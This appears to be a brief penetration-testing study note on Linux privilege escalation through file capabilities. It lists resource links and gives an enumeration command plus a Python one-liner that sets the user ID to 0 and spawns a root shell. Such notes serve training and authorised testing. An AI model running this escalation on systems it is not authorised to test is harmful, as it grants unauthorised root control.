Capabilities

• Similar to suid but more secure.

Enumeration

• getcap -r / 2>/dev/null

Exploitation

• In our example the command to enumerate gave us /usr/bin/python2.6
• We just need to run python with a command that will give us root /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Resources

Linux Privilege Escalation using Capabilities - Hacking ArticlesHacking Articles

Linux Privilege Escalation using Capabilities

SUID vs Capabilities

SUID vs Capabilities

Day 44: Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced.Medium

Linux Capabilities Privilege Escalation

Linux Privilege Escalation

TCM Security - Linux Privilege Escalation